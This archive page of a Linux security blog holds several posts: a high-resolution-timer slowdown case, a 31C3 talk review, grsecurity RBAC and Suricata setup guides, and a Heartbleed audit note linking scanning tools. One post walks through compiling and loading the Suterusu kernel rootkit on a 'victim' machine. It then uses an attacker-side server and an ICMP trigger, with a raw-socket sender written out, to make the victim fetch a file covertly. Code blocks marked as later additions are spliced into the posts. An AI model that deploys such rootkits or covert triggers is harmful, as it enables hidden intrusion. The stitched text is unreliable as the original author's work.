Tuesday, March 17, 2015

HIGHRES TIMER can be your DoS nightmare

This is a real-life story about the HIGH RESOLUTION TIMER and how lame
coders use it to make a self-DoS ;-) You should be very cautious if
your system was written by that type of coder.

Incident happened:

1, A dozen RHEL 6 GNU/Linux servers were extremely slow while
running some *** applications. The kernel (system) CPU usage was about
40%-50%.

2, The "free" column in vmstat did not look right. "free" kept
increasing while "buff" & "cache" kept decreasing as a bunch of data
went through. Then the kernel gave you a *hint* about OOM (Out of Memory):

"kernel panic - not syncing: Out of memory and no killable processes..."

The kernel had tried to kill processes one by one until shit happened,
which was the kernel panic: that message means the OOM killer ran out
of processes it was allowed to kill.

I began this investigation with strace. The result was quite
strange. Why would the application (malware?) invoke the syscall
nanosleep() so often? Every 10000 ns (10 us)? Seriously? All I can tell
is that the application doesn't need to do real-time work.

--------------------------------------------------------------
15:30:08.002047 nanosleep({0, 10000}, NULL) = 0 <0.000082>
15:30:08.002175 nanosleep({0, 10000}, NULL) = 0 <0.000074>
15:30:08.002297 nanosleep({0, 10000}, NULL) = 0 <0.000074>
...
15:30:09.917557 nanosleep({0, 10000}, NULL) = 0 <0.000075>
15:30:09.917661 nanosleep({0, 10000}, NULL) = 0 <0.000071>
--------------------------------------------------------------

The customer said this had never happened on the good old GNU/Linux
systems (like RHEL 5). My gut pointed me in a direction: the High
Resolution Timer, a type of kernel timer that provides much finer time
resolution than the jiffies tick. I read the Linux manual and the very
well explained kernel doc and learned that HIGHRES TIMER support was
added to the upstream code in 2.6.21. So I guess.. just guess.. some
lazy & lame coder wanted to make the program "sleep" for a very "short"
time, and wrote this line very confidently:

usleep(10);

On a kernel without high-resolution timers (before 2.6.21, or booted
with highres=off), nanosleep() is rounded up to the timer tick, so this
line only sleeps between 1 ms and 2 ms on a 1000 Hz kernel. But.. the
annoying *but* is coming.. if you're running a *modern* GNU/Linux distro
with HIGHRES support, the same line really does sleep about 10 us, and
the loop around it now wakes up roughly a hundred times more often.
That is where the performance hit comes from. The CentOS community ran
into a similar issue before:



From the evidence we have, two clues lead us to the crime scene: the
High Resolution Timer.

1, nanosleep() was invoked >= 8k times every fuc*ing second.

2, The victim kernel was not running with kdump, but we still have
some kernel logs. According to the call trace, the kernel was inside
HIGHRES-related code (__hrtimer_start_range_ns) when it died, which
should not be a coincidence:

 [] ? audit_syscall_exit+0x27e/0x290
 [] ? sysret_audit+0x16/0x20
 [] ? __hrtimer_start_range_ns+0x1a3/0x460
 [] ? sysret_audit+0x16/0x20
 [] ? sysret_audit+0x16/0x20
 [] ? audit_filter_rules+0x2d/0xa10
 [] ? audit_syscall_exit+0x27e/0x290
 [] ? sysret_audit+0x16/0x20
schedule_timeout: wrong timeout value ffffffffffffb572


Solution:

I'm giving you two options:

1, Fix the *sleep*-related code in the application (if you have the
source) and tell the fuc*ing coders they can go home and fuck
themselves.

2, Append "nohz=off highres=off" to the kernel command line in
/etc/grub.conf to turn this fuc*ing feature off. This is a blunt,
system-wide workaround: every process on the box loses timer precision,
so treat it as a stopgap until the application is fixed. You can verify
which mode a running kernel is in with "grep hres_active
/proc/timer_list" (1 means high resolution mode is active).
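To see the story's numbers on your own box, here is an added example of mine (not the customer's application and not code from the original post): timed_nanosleep() measures how long one nanosleep({0, 10000}) really takes, and count_sleeps() runs the same poll-with-a-tiny-sleep loop for a fixed time budget and counts the syscalls it issues. Run it once with high resolution timers active and once after booting with highres=off, or simply compare the 10 us loop with the 1 ms loop: the 1 ms version is what the fixed code should look like when the work does not need microsecond reaction time. The 500 ms budget in main() is an arbitrary choice.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <time.h>

/* Nanoseconds elapsed from reading a to reading b (both CLOCK_MONOTONIC). */
static int64_t ns_between(const struct timespec *a, const struct timespec *b)
{
    return (int64_t)(b->tv_sec - a->tv_sec) * 1000000000LL
         + (int64_t)(b->tv_nsec - a->tv_nsec);
}

/* Sleep for `ns` nanoseconds with nanosleep(), resuming after signals, and
 * return how long the call really took.  With high resolution timers active
 * this is close to `ns` plus a few microseconds of syscall overhead; with
 * jiffies-resolution timers it is at least one tick (1-2 ms at HZ=1000). */
int64_t timed_nanosleep(long ns)
{
    struct timespec req = { ns / 1000000000L, ns % 1000000000L }, rem, t0, t1;
    clock_gettime(CLOCK_MONOTONIC, &t0);
    while (nanosleep(&req, &rem) == -1 && errno == EINTR)
        req = rem;                       /* interrupted: sleep the remainder */
    clock_gettime(CLOCK_MONOTONIC, &t1);
    return ns_between(&t0, &t1);
}

/* The pattern from the story: a polling loop that "waits a bit" with a short
 * sleep between checks.  Runs for about budget_ns and returns how many
 * nanosleep() calls it issued.  Nothing else is done per iteration, so the
 * count is purely timer behaviour plus syscall overhead. */
long count_sleeps(long sleep_ns, int64_t budget_ns)
{
    struct timespec start, now;
    long calls = 0;
    clock_gettime(CLOCK_MONOTONIC, &start);
    do {
        timed_nanosleep(sleep_ns);
        calls++;
        clock_gettime(CLOCK_MONOTONIC, &now);
    } while (ns_between(&start, &now) < budget_ns);
    return calls;
}

int main(void)
{
    const int64_t budget = 500000000LL;  /* half a second per experiment */
    printf("one usleep(10) equivalent took %" PRId64 " ns\n", timed_nanosleep(10000));
    printf("usleep(10)   loop: %ld nanosleep() calls in 0.5 s\n", count_sleeps(10000, budget));
    printf("usleep(1000) loop: %ld nanosleep() calls in 0.5 s\n", count_sleeps(1000000, budget));
    return 0;
}
```

On a HIGHRES kernel the first loop lands in the thousands of calls per half second, which is the ">8,000 per second" of the story; with highres=off the same loop is throttled to the tick rate, which is what the table below measures as 345.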


Testing result:

Unfortunately, we had to test this in a production system..but we did
it.

+------------+---------------------+---------------+
| Item       | HIGHRES ON          | HIGHRES OFF   |
+------------+---------------------+---------------+
| nanosleep  | >8,000 calls/sec    | 345 calls/sec |
+------------+---------------------+---------------+
| buff/cache | Decreasing          | Increasing    |
+------------+---------------------+---------------+
| %sys       | 50%                 | 6%            |
+------------+---------------------+---------------+

Well, I guess we arrested the *perpetrator* this time. Damn... not every
business impact is caused by a security issue ;-)

Saturday, January 03, 2015

Happy New Year 2015

Time runs on and brings us to another new year. Does this fuc*ing mean another fight? I've been sitting on my butt watching a lot of presentations from 31C3. Unfortunately, I couldn't be there physically. I'm fuc*ing jealous of you guys who were there ;-)

I've learned a lot from these videos. So I'd like to write down what I think about some great topics.

31C3 Opening Event [31c3] with Erdgeist and Geraldine de Bastion
Nothing I can say about opening;-)


Jacob Appelbaum: Reconstructing narratives - transparency in the service of justice

This is the most fuc*ing awesome presentation I've seen in 2014, since I watched Jacob's free speech at the last C3 conference. Yes.. what I've been trying to tell people (friends & customers): there are only a few things we may rely on: OTR, PGP, SSL/TLS with PFS... This is a very positive message that not everything is being fucked. Well... IMHO, taking only crypto itself into account is not enough. Kernel hardening should be a must-have, more than ever before. A lot of 0ld sch00l guys are complaining that people still don't take system-level security seriously (PaX/Grsecurity? Qubes OS? MirageOS?) even after EFF released its security guideline. Even the Information Security for Journalists handbook focuses on crypto for the most part...... damn... I think there is a lot of interesting stuff we could try in 2015.............

SS7map : mapping vulnerability of the international mobile roaming infrastructure [31c3]

Well done, P1Sec guys! Telco security is not my major focus, but I've been learning CORENET stuff from some friends over the last few years. According to ss7map, China is one of the countries with high risk in its CORENET. Guess a huge consulting market is out there ;-)


The Cloud Conspiracy 2008-2014 [31c3]


Everybody is talking about the cloud. The cloud might help small startups (which don't have sensitive data) in many aspects, especially on cost. But.. speaking of cloud security, damn.. I'm gonna say it out loud: the security of public cloud is a joke, the security of private cloud is a fraud ;-)

Trustworthy secure modular operating system engineering

Building trust chains within compartments/containment is not a bad idea for defense in depth. "What you're doing is wrong" is a common phrase in the hacker community. But how to do it right is a scientific problem ;-) I don't think a type-safe language will be a silver bullet. New issues and snake-oil security products always come out. People will be happy to talk about how "Next-Gen" technology is gonna change the future... unfortunately, they have no idea what the fuc* they are talking about (in most cases). Why would the fuc*ing industry need "Next-Gen" technology? I guess no one wants to talk about what the hell the Last-Gen tech was ;-)

SS7: Locate. Track. Manipulate.

Wow.. very good work, Tobias! I was so excited when you showed the demo. CORENET is really interesting and amazing. That reminds me of a saying from Captain: "The phone company is nothing but a computer... A computer is a System...". Ohh, did I say "cloud"?



Switches Get Stitches - Industrial System Ownership




People have been taking ICS security seriously since the disclosure of Stuxnet. In the meantime, snake-oil products/services just come out of nowhere. This talk is awesome. It's almost like ICS security 101 to me. Thanks Eireann, I think I owe you a beer ;-)

Reproducible Builds - Moving Beyond Single Points of Failure for Software Distribution

I love EFF and am proud to be a member. EFF has been doing a great job on public education and fighting for individuals' privacy. I'm not sure if we can win or not. But this is the right thing to do. Revealing the dark side of cybersecurity is inevitable. We have to deal with shit like Mr. Dullien mentioned in "Offensive work and addiction". Did we ever have a chance to live in a *pure* world without "I hunt sysadmins"? If we don't, reproducible builds are very valuable for us against mass surveillance. Gitian is a project which Seth & Mike mentioned.

Reproducible builds can't solve all potential threats. But they can help us, at some level, to decide "there is a backdoor in the (supposedly) identical binary, or there isn't". You might also want to read about the Trusting Trust issue.

By the way, another reason I love Debian is the Mempo project ;-) We need your hands.. fuck off, NSA!

Freedom in your computer and in the net


Fascinating free speech from RMS! My wife believes that to be idealistic is to be realistic... are we talking about a leap of faith? Sometimes faith is all we have left ;-) RMS is one of the most respected men. His philosophy inspired me to start using GNU/Linux. Phrack inspired me to be a cybersec dude....



RMS talked about a few important things at 31C3:
1, The difference between Free Software and open source. Free Software is more concerned about ethics (libre), while open source only emphasizes practical stuff like code quality or cost.

2, The security aspect. Free Software is more secure than closed software. Microsoft sends the NSA information about Windows bugs before they fix them; maybe other vendors (of closed-source products) do the same.

3, RMS thinks all universities should teach reverse engineering. It's a good choice when you have to explore something in a closed-source world.

4, RMS said "...also the software they teach students to use must be free, because the school has a social mission to educate good citizens of a society that is strong, capable, independent, cooperating and free..". Damn.. I was touched. I've been asking myself a question for a long time: why would I support FSF and EFF in the 1st place? Probably I can say now: it's worth it. Making sure the public can benefit from it, and educating the public about free software and digital privacy, are so important in the information age.

btw: Hope I can make it to 31C3.

May the L0rd's hacking spirit guide us in 2015!

Sunday, August 10, 2014

An awesome linux kernel rootkit: Suterusu


I've been fuc*ing busy since I left SuSE about two months ago. I have a lot of time to hack/learn anything I want. Well, a rootkit is one of my TODO items, as always. I wrote a dumb rootkit half a year ago. It uses the good old method of hiding files: hijacking some syscalls. There's a better solution called "inline hooking". Suterusu is the one that implements an inline hook framework. I don't want to explain the details of how Suterusu is implemented, 'cuz no one (in most cases) would do the job better than the original author: Michael Coppola already wrote a good article, "Suterusu Rootkit: Inline Kernel Function Hooking on x86 and ARM".

I always want to make some open source rootkits work on the latest version of GNU/Linux. Damn... I'd be exhausted if I really did that. There are a bunch of rootkits (adore-ng, ddrk, kbeast-v1, wnps, etc.) out there that have been out of date for years. Although you might find some "modern" ones like maK_it, kernel-rootkit-2.6.32, etc... but.. there's always an annoying "but"... these rootkits either lack an inline hook framework or can't support a diverse range of linux kernel versions. I've tested Suru on a dozen different linux kernels, from 2.6.35 to 3.13.1. Now I'm going to share two stories of mine (of course, Suru-related ;-)):

1, A friend asked for advice about rootkit selection; of course I'd never hesitate to tell him to use Suru. When he tried to use it, he found out he couldn't compile it on kernel-3.14.1. Then I modified a few lines of code and it worked.

2, Another friend (a pentester) asked me if I could make any rootkit work on CentOS 6.5 with 2.6.32-431.el6 x86_64. I tried Suru and found out it didn't support 2.6.32 yet. Then I added less than 100 LOC and it worked.

Suru is an awesome rootkit. I'm sure a lot of people are using it. Today I found out about two features of Suru called "ICMP" and "DLEXEC" that I had never looked into. A friend (still that pentester) told me they can be used as a covert channel to transfer files. I wrote a triggering program that crafts a specific ICMP header/payload and sends it to the "victim server". When the victim receives the packet, it downloads a file from a specific server.

---------------------------------------------------------------------
1. Download the Suterusu for both "victim" and "attacker".

2. The victim is using CentOS 6.5:
[root@centos-rktesting ~]# uname -r
2.6.32-431.el6.x86_64


2.1 Install some necessary packages:
yum install -y kernel-devel.x86_64 gcc vim

2.2 Compile & load the rootkit. Note that yum pulled in kernel-devel for 2.6.32-431.23.3.el6, which is newer than the running 2.6.32-431.el6 kernel shown by uname -r above; a module built against those headers carries the 431.23.3 vermagic and insmod will refuse it on the older kernel, so either point KDIR at /usr/src/kernels/$(uname -r) or reboot into the matching kernel first:
[root@centos-rktesting suterusu]# make linux-x86_64 KDIR=/usr/src/kernels/2.6.32-431.23.3.el6.x86_64/ ICMP=y DLEXEC=y
make ARCH=x86_64 EXTRA_CFLAGS="-D_CONFIG_X86_64_ -D_CONFIG_DLEXEC_ -D_CONFIG_ICMP_" -C /usr/src/kernels/2.6.32-431.23.3.el6.x86_64/ M=/root/suterusu modules
make[1]: Entering directory `/usr/src/kernels/2.6.32-431.23.3.el6.x86_64'
  CC [M]  /root/suterusu/main.o
  CC [M]  /root/suterusu/util.o
  CC [M]  /root/suterusu/module.o
  CC [M]  /root/suterusu/dlexec.o
  CC [M]  /root/suterusu/icmp.o
  LD [M]  /root/suterusu/suterusu.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /root/suterusu/suterusu.mod.o
  LD [M]  /root/suterusu/suterusu.ko.unsigned
  NO SIGN [M] /root/suterusu/suterusu.ko
make[1]: Leaving directory `/usr/src/kernels/2.6.32-431.23.3.el6.x86_64'

[root@centos-rktesting suterusu]# insmod suterusu.ko
 

3. The attacker can use any GNU/Linux distro you want. Compile the file server and designate the file you want to be transferred:
shawn@shawn-fortress /tmp/suterusu $ sudo ./a.out 8556 README.md
Bound to port 8556, waiting for connection...


3.1 Open a new terminal:
shawn@shawn-fortress /tmp/suterusu $ cd test/
shawn@shawn-fortress /tmp/suterusu/test $ ls
trigger_icmp_covert.py
shawn@shawn-fortress /tmp/suterusu/test $ ./trigger_icmp_covert.py


 4. Go to the victim's machine, check:
[root@centos-rktesting ~]# cat /root/.tmp
Suterusu
========

Typical compilation steps:

...........................................................
.................................................................

---------------------------------------------------------------------
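The packet-crafting half of the trigger step above, as an added example of mine (not Suterusu's code and not the author's trigger_icmp_covert.py): build an ICMP echo request with a chosen payload and send it over a raw socket. The RFC 792 checksum is the part people get wrong (odd-length payloads, folding the carries), so it is written out and self-checking: run over the finished message it must come back as 0. The payload format "MAGIC:ip:port", the identifier 0x1234 and the address 192.0.2.10 are invented placeholders; Suterusu's real trigger format lives in its icmp.c and is not reproduced here. Sending needs CAP_NET_RAW (root); building and dumping the packet does not.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#define ICMP_ECHO_REQUEST 8

/* RFC 792 checksum: one's complement of the one's-complement sum of the
 * 16-bit words of the message, with the checksum field taken as zero.  Over a
 * finished message (checksum filled in) it returns 0. */
uint16_t icmp_checksum(const uint8_t *data, size_t len)
{
    uint32_t sum = 0;
    size_t i;
    for (i = 0; i + 1 < len; i += 2)
        sum += (uint32_t)((data[i] << 8) | data[i + 1]);
    if (i < len)                      /* odd trailing byte, padded with zero */
        sum += (uint32_t)(data[i] << 8);
    while (sum >> 16)                 /* fold carries back into 16 bits */
        sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Build an ICMP echo request: 8-byte header followed by the payload.
 * Returns the total length, or 0 if the buffer is too small. */
size_t build_icmp_echo(uint8_t *buf, size_t buflen, uint16_t ident, uint16_t seq,
                       const uint8_t *payload, size_t plen)
{
    uint16_t csum;
    if (buflen < 8 + plen) return 0;
    buf[0] = ICMP_ECHO_REQUEST; buf[1] = 0;          /* type, code */
    buf[2] = 0; buf[3] = 0;                          /* checksum placeholder */
    buf[4] = ident >> 8; buf[5] = ident & 0xff;
    buf[6] = seq >> 8;   buf[7] = seq & 0xff;
    memcpy(buf + 8, payload, plen);
    csum = icmp_checksum(buf, 8 + plen);
    buf[2] = csum >> 8; buf[3] = csum & 0xff;
    return 8 + plen;
}

/* Checksum field of a freshly built echo request, for checking by hand. */
uint16_t echo_checksum_of(uint16_t ident, uint16_t seq, const char *payload)
{
    uint8_t pkt[128];
    size_t len = build_icmp_echo(pkt, sizeof pkt, ident, seq,
                                 (const uint8_t *)payload, strlen(payload));
    return len ? (uint16_t)((pkt[2] << 8) | pkt[3]) : 0;
}

/* 1 if the finished message checksums to zero, as RFC 792 requires. */
int echo_verifies(uint16_t ident, uint16_t seq, const char *payload)
{
    uint8_t pkt[128];
    size_t len = build_icmp_echo(pkt, sizeof pkt, ident, seq,
                                 (const uint8_t *)payload, strlen(payload));
    return len != 0 && icmp_checksum(pkt, len) == 0;
}

/* Send a prepared ICMP message over a raw socket.  The kernel prepends the IP
 * header for IPPROTO_ICMP raw sockets.  Returns bytes sent or -1. */
ssize_t send_icmp_raw(const char *dst_ip, const uint8_t *msg, size_t len)
{
    struct sockaddr_in dst;
    int fd = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
    ssize_t n;
    if (fd < 0) return -1;
    memset(&dst, 0, sizeof dst);
    dst.sin_family = AF_INET;
    if (inet_pton(AF_INET, dst_ip, &dst.sin_addr) != 1) { close(fd); return -1; }
    n = sendto(fd, msg, len, 0, (struct sockaddr *)&dst, sizeof dst);
    close(fd);
    return n;
}

/* usage: ./a.out [victim-ip [payload]]  (no args: just hex-dump the packet) */
int main(int argc, char **argv)
{
    /* Hypothetical trigger payload: a tag plus "ip:port" of the file server. */
    const char *payload = argc > 2 ? argv[2] : "MAGIC:192.0.2.10:8556";
    uint8_t pkt[128];
    size_t i, len = build_icmp_echo(pkt, sizeof pkt, 0x1234, 1,
                                    (const uint8_t *)payload, strlen(payload));
    if (!len) { fprintf(stderr, "payload too long\n"); return 1; }
    for (i = 0; i < len; i++)
        printf("%02x%s", pkt[i], (i % 16 == 15 || i + 1 == len) ? "\n" : " ");
    if (argc > 1) {
        if (send_icmp_raw(argv[1], pkt, len) < 0) { perror("send_icmp_raw"); return 1; }
        printf("sent %zu bytes to %s\n", len, argv[1]);
    }
    return 0;
}
```

The victim-side counterpart is a hook on the ICMP receive path that matches the tag and parses the rest; watch for the packet with tcpdump -X on the victim and you will see the payload in the clear, which is why this is a covert *channel* and not a hidden one.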

That's it! Show time is over! It's quite simple, eh? I really appreciate that Michael Coppola released Suterusu under a free/open source software license. And I also thank him for bringing us good writings ;-)

btw: What's next? I'll probably go try some memory forensics, to see if I can hunt some rootkits ;-)

Have fun & good hunting!!!

May the L0rd's hacking spirit guide us!!!

Further readings:
[1] RFC-792
http://tools.ietf.org/html/rfc792

[2] Python documentation:
https://docs.python.org/2/library/struct.html

[3] TCP/IP protocols
http://www.protocols.com/pbook/tcpip3.htm

[4] Sock-RAW
http://sock-raw.org/papers/sock_raw

Wednesday, May 14, 2014

Simple Grsecurity RBAC policy with kernel 3.14.1 on Debian 7.4

Speaking of kernel hardening, I personally like AppArmor and am sick of SELinux (you know why). pi3's paper in Phrack Issue 67 was the first place I met Grsecurity/PaX. I never forget that 30 seconds would help people build defense in depth ;-) Then I went back to read some Phrack papers from the good old hacking days that I had missed, and learned they are the original authors of ASLR... and much more. No doubt Grsecurity/PaX is one of the most respected old school communities...... Note: Grsecurity/PaX don't use LSM, since LSM breaks the principle of building security in, which should treat security as a whole. I think it's time to explore....

Download kernel:
https://www.kernel.org/pub/linux/kernel/v3.x/linux-3.14.1.tar.xz

Download the grsecurity patch:
https://www.grsecurity.net/test/grsecurity-3.0-3.14.3-201405121814.patch

Patch the kernel with grsecurity:
xz -d linux-3.14.1.tar.xz
tar xvf linux-3.14.1.tar
cd linux-3.14.1/
patch -p1 < ../grsecurity-3.0-3.14.3-201405121814.patch

One caveat: the patch name says 3.14.3 while the tarball above is 3.14.1. grsecurity patches are cut against the exact upstream release in their filename, so grab the matching kernel tarball (or the patch built for 3.14.1) and check patch's output for rejected hunks (*.rej files) before you build anything.

You can use my kernel config:
https://raw.githubusercontent.com/citypw/citypw-SCFE/master/security/apparmor_test/debian-7.4-linux-3.14.1-grsec.config

Or make your own config via "make menuconfig". Then compile the kernel:
make -j3 deb-pkg

It will help you build deb packages. All you need to do is install them:
dpkg -i ../*.deb

Now, the kernel part is done. Download gradm( RBAC administrator utility):
https://www.grsecurity.net/stable/gradm-3.0-201401291757.tar.gz

tar zxvf gradm-3.0-201401291757.tar.gz
cd gradm/
make && make install

Reboot the machine:
shutdown -r now

Now, you need to set a bunch of annoying passwords:
root@d6-test:/etc/grsec# gradm -P
Setting up grsecurity RBAC password
Password:
Re-enter Password:
Password written to /etc/grsec/pw.
root@d6-test:/etc/grsec#
root@d6-test:/etc/grsec# gradm -P admin
Setting up password for role admin
Password:
Re-enter Password:
Password written to /etc/grsec/pw.
root@d6-test:/etc/grsec#
root@d6-test:/etc/grsec# gradm -P shutdown
Setting up password for role shutdown
Password:
Re-enter Password:
Password written to /etc/grsec/pw.

Add this:
https://raw.githubusercontent.com/citypw/citypw-SCFE/master/security/apparmor_test/grsec_conf.a.out

to the tail of /etc/grsec/policy, then run "gradm -C" to check the policy for errors and "gradm -E" to enable the RBAC system ("gradm -D", which asks for the password set above, disables it again if you lock yourself out).

What I did in the above policy: I created role shawn as a user role with some default policies, like /bin being executable only, etc. Then I gave the binary /home/shawn/grsec_test/a.out read permission on /home/shawn/hello and write permission on /home/shawn/world, and disallowed it from running another shell. You can use my code to test the policy:

https://raw.githubusercontent.com/citypw/citypw-SCFE/master/security/apparmor_test/apparmor_test.c
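An added example of the kind of probe program that policy is written for (my own code, not the author's apparmor_test.c): each probe returns 0 on success or the errno the kernel handed back, so you can run it once with RBAC disabled and once after gradm -E and diff the two outputs. The paths /home/shawn/hello, /home/shawn/world and /bin/sh come from the post's description of the policy; the binary has to be installed at the subject path the policy names (/home/shawn/grsec_test/a.out) for the subject's rules to apply to it, otherwise only the role's defaults are in effect.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* open(path) read-only: 0 on success, otherwise errno (EACCES when RBAC
 * denies the read, ENOENT when the object is hidden with the 'h' flag). */
int probe_read(const char *path)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0) return errno;
    close(fd);
    return 0;
}

/* open(path) write-only; no O_CREAT, so a missing file is reported, not made. */
int probe_write(const char *path)
{
    int fd = open(path, O_WRONLY);
    if (fd < 0) return errno;
    close(fd);
    return 0;
}

/* Fork and execv(prog, "-c", "true").  Returns 0 if the exec succeeded and
 * the child exited 0, the exec errno if execv() failed (what a "no other
 * shell" policy produces), or -1 on any other failure.  The errno travels
 * back over a close-on-exec pipe: if the exec works the write end closes
 * untouched and the parent reads nothing. */
int probe_exec(const char *prog)
{
    int pfd[2], err = 0, status;
    pid_t pid;
    if (pipe(pfd) < 0) return -1;
    fcntl(pfd[1], F_SETFD, FD_CLOEXEC);
    pid = fork();
    if (pid < 0) { close(pfd[0]); close(pfd[1]); return -1; }
    if (pid == 0) {
        char *argv[] = { (char *)prog, "-c", "true", NULL };
        close(pfd[0]);
        execv(prog, argv);
        err = errno;                           /* only reached when exec failed */
        if (write(pfd[1], &err, sizeof err) < 0) { /* nothing better to do */ }
        _exit(127);
    }
    close(pfd[1]);
    if (read(pfd[0], &err, sizeof err) != (ssize_t)sizeof err) err = 0;
    close(pfd[0]);
    if (waitpid(pid, &status, 0) < 0) return -1;
    if (err) return err;
    return (WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 0 : -1;
}

static void report(const char *what, int rc)
{
    printf("%-26s %s\n", what, rc == 0 ? "ok" : (rc > 0 ? strerror(rc) : "failed"));
}

int main(void)
{
    /* Expected with the post's policy enabled: the first two succeed and the
     * shell exec is refused; with gradm -D all three succeed. */
    report("read  /home/shawn/hello", probe_read("/home/shawn/hello"));
    report("write /home/shawn/world", probe_write("/home/shawn/world"));
    report("exec  /bin/sh -c true",   probe_exec("/bin/sh"));
    return 0;
}
```

If the exec probe comes back ENOENT rather than EACCES, the policy hides the shell ('h') instead of merely withholding the 'x' bit; both are a pass for "no other shell", but the difference tells you which object line matched.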

btw: I tested the PoC of CVE-2014-0196 on kernel-3.13 and it crashed the kernel. I tested it on kernel-3.14.1 with Grsecurity and it doesn't work. But this issue should affect 3.14.1... ah, I think Grsecurity works in some "mysterious" way to prevent this PoC. I'll dig deeper into this amazing hardening implementation.

Further readings:
[1] Grsecurity wiki
http://en.wikibooks.org/wiki/Grsecurity

[2] Documentation for the PaX project
https://pax.grsecurity.net/docs/

[3] Grsecurity Blog
https://forums.grsecurity.net/viewforum.php?f=7

Wednesday, April 16, 2014

Audit: don't only focus on heartbleed issue

I received the info about the heartbleed issue on Apr 8 and I found out SLES-11 is using the OpenSSL 0.9.8 branch, which is not vulnerable to heartbleed. Then I patched it for openSUSE 13.1/12.3. It was easy because the patch was already there.

After an exciting and crazy week, people are calming down and planning, or have already started, an audit of their systems. But there are some things you might miss. An older version of OpenSSL (like 0.9.8) might not be affected by heartbleed, but that doesn't mean you are secure. Don't forget that old OpenSSL builds are still exposed to BEAST (2011, a TLS 1.0 CBC weakness), CRIME (2012, TLS compression, which you should disable) and Lucky Thirteen (2013, a CBC padding timing oracle that was fixed in the library). I do believe Lucky Thirteen is far more dangerous than heartbleed; we just don't know. Once you start the audit, plz upgrade OpenSSL to the latest version. If you are using 0.9.8, plz upgrade to at least 0.9.8y, which contains the Lucky-13 fix.

Fixing heartbleed for a website is much easier than for networking devices (Firewall, UTM, SSL/IPsec VPN, etc.) and 3rd-party software. This is definitely going to have a long-term impact.

I'd like to share some materials (you might already know them).

Heartbleed issue technical analysis:
https://www.getpantheon.com/heartbleed-fix
http://blog.ioactive.com/2014/04/bleeding-hearts.html
http://blog.cryptographyengineering.com/2014/04/attack-of-week-openssl-heartbleed.html


I totally agree with the last point from this article:
http://blog.cryptographyengineering.com/2014/04/attack-of-week-openssl-heartbleed.html

Major companies that rely heavily on open source TLS implementations (OpenSSL, GnuTLS, etc.) should give them funding, to make them more secure and stable.

EFF is always right about how to fight massive surveillance by agencies
like the NSA. PFS is so fuc*ing important, especially today. I think we should use TLS 1.2.

https://www.eff.org/deeplinks/2014/04/wild-heart-were-intelligence-agencies-using-heartbleed-november-2013
https://www.eff.org/deeplinks/2014/04/why-web-needs-perfect-forward-secrecy
https://www.eff.org/deeplinks/2013/08/pushing-perfect-forward-secrecy-important-web-privacy-protection
https://www.eff.org/deeplinks/2011/11/long-term-privacy-forward-secrecy

PFS is so important, yet only a few websites use it; the performance hit is probably one of the reasons:
http://nmav.gnutls.org/2011/12/price-to-pay-for-perfect-forward.html

Test top-1m websites:
https://github.com/musalbas/heartbleed-masstest

C:
https://github.com/robertdavidgraham/heartleech

Client PoC:
https://github.com/Lekensteyn/pacemaker

---------------------------------------------------------
One more thing, to those who are still complaining that the security of free/open source software is worse than closed software. Well, I don't want to argue here. But I'm giving you type of people 3 options:
1, Join the community, help the FOSS community do code audits.
2, Make some donations to the organizations who really care about your privacy and do the code audit for us. Like EFF; I'm fuc*ing proud of being a member of EFF.....
3, G O   H O M E   A N D   F U C K   Y O U R S E L F   ! ! !

Monday, March 31, 2014

Suricata's file extraction on Debian GNU/Linux

Suricata is a high performance open source IDS/IPS project. I used it a long time ago, around 2010 when it was released. I've been playing with Snort recently and then found that Suricata has a great feature: file extraction. It'd be helpful to those who want to get malware samples from an IDS. Anyway, like in the old days, I want to test it on my own and see how it works on Debian. First things first, I need to build it and see if it works.

Download the latest version of the small (netinst) installation ISO image. I need to clarify my testing environment: Debian is running in my virtual machine, which has two NICs, eth0 and eth1. Interface eth0 is running in NAT mode and eth1 in bridged mode. Debian doesn't assign any IP addr to eth1; a pure sniffing interface doesn't need one.

Because our Debian is the small installation, we have to install some dependency packages via a simple apt-get:

#apt-get install vim openssh-server ethtool libpcap-dev libnfnetlink-dev libnetfilter-queue-dev libdnet-dev libdumbnet-dev libpcre3-dev libpcre3-dbg bison flex make zlib1g-dev autoconf libtool libnss3-dev libnspr4-dev libjansson4 libjansson-dev libyaml-dev libcap-ng0 libcap-ng-dev libnet1-dev libmagic-dev build-essential

Get the source code of Suricata:
#cd /tmp
#wget http://www.openinfosecfoundation.org/download/suricata-2.0.tar.gz
#tar zxvf suricata-2.0.tar.gz
#cd suricata-2.0

Compile and install ("make install-full" also drops the default suricata.yaml and the Emerging Threats rule set under the prefix):
#./configure --enable-nfqueue --enable-gccprotect --prefix=/usr/local/suricata --localstatedir=/var
#make -j3
#make install-full

Edit suricata.yaml:
1, Set the request/response body limits a little bigger. These limits bound how much of each HTTP body Suricata keeps, so extracted files larger than the limit get cut off; 1gb is fine for a lab box, not for a busy sensor:
           request-body-limit: 1gb #3072
           response-body-limit: 1gb #3072

2, Enable file extraction:
  - file-store:
      enabled: yes       # set to yes to enable
      log-dir: files    # directory to store the files
      force-magic: no   # force logging magic on all stored files
      force-md5: no     # force logging of md5 checksums
      waldo: file.waldo # waldo file to store the file_id across runs

  # output module to log files tracked in a easily parsable json format
  - file-log:
      enabled: yes
      filename: files-json.log
      append: yes
      #filetype: regular # 'regular', 'unix_stream' or 'unix_dgram'

3, Add our "test" rule file( test.rules in this case) into the section "default-rule-path:", like:
default-rule-path: /usr/local/suricata/etc/suricata/rules
rule-files:
 - test.rules
 - botcc.rules

Create a rule file:
/usr/local/suricata/etc/suricata/rules/test.rules

Add one line into test.rules( to save any jpg files) :
alert http any any -> any any (msg:"FILESTORE jpg"; fileext:"jpg"; filestore; sid:6; rev:1;)

Enable the eth1:
#ifconfig eth1 up

According to Suricata's wiki, we should turn off the NIC offloading features (TSO/GSO/GRO/LRO, etc.) on the capture interface, so that Suricata sees the segments as they were on the wire instead of merged super-packets:
ethtool -K eth1 tso off
ethtool -K eth1 gro off
ethtool -K eth1 lro off
